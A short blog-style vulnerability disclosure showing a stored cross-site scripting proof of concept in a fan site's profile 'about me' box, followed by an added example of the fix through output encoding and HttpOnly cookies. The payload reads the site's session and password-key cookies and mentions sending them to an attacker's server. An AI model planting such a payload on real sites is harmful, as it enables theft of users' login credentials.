A new site design for the B`Daman Empire includes self-editable profiles. This opens up the possibility of hacking users' pages. So I checked it out. Can I successfully hack my own page? And also infiltrate the pages of others? The following is a proof of concept; I do not endorse its use, and it is shown only for educational purposes.
What Can We Do?
One of the scariest things we can do is grab the username + password combination used for logging in to B`Daman Empire. This would allow someone to send these combos to a server for cracking. This is obviously a very scary idea. The following demonstrates this sort of attack.
Demo
Make an account and go to the edit profile page. Once there put the following into the about me box:
<script type="text/javascript">
// Return the value of the named cookie from document.cookie, or null if absent.
function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for (var i = 0; i < ca.length; i++) {
        var c = ca[i];
        // Trim the leading space left after each ';' separator.
        while (c.charAt(0) == ' ') c = c.substring(1, c.length);
        if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
    }
    return null;
}
alert(readCookie("Key_Empire"));
</script>
Then reload your profile and you will see your encrypted password key pop up. You can just as easily make your username pop up by replacing Key_Empire with ID_Empire. You could easily furnish an AJAX call to send those keys to your server. This is a severe vulnerability that must be fixed. For a demo of this go to my profile: http://testbdamanempire.phpnet.us/pubprofile.php?user=gsmaverick
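As an added example (not code from the original post or from the B`Daman Empire site), here is how the profile page could neutralise the payload above: HTML-encode the about-me text before writing it into the page, and set the session cookies HttpOnly so document.cookie cannot read them even if a script does run. The cookie names Key_Empire and ID_Empire and the username come from the post; the field name, function names and cookie attributes are assumptions.

```javascript
// Added example, not from the original post. Two independent fixes for the
// stored XSS in the about-me box: (1) output encoding, so "<script>" is
// rendered as inert text; (2) HttpOnly session cookies, so a script that does
// run cannot read Key_Empire / ID_Empire via document.cookie.
// Function names and cookie attributes are assumptions for this example.

// Encode the five characters that let text break out of an HTML text node
// or a quoted attribute value.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Render the public profile; the about-me text is treated as data, never as markup.
function renderProfile(user, aboutMe) {
  return "<h1>" + escapeHtml(user) + "</h1>\n" +
         "<div class=\"about\">" + escapeHtml(aboutMe) + "</div>";
}

// Build Set-Cookie headers for the two cookies the post names. HttpOnly keeps
// them out of document.cookie; Secure and SameSite limit where they are sent.
function sessionCookieHeaders(id, key) {
  const attrs = "; Path=/; HttpOnly; Secure; SameSite=Lax";
  return [
    "ID_Empire=" + encodeURIComponent(id) + attrs,
    "Key_Empire=" + encodeURIComponent(key) + attrs,
  ];
}

// Constructed sample input: the payload from the post, as stored in the about-me box.
const payload = '<script type="text/javascript">alert(readCookie("Key_Empire"));</script>';

// Returns the rendered HTML and whether any real <script> tag survived encoding.
function demo() {
  const html = renderProfile("gsmaverick", payload);
  return { html: html, inert: !/<script/i.test(html) };
}
```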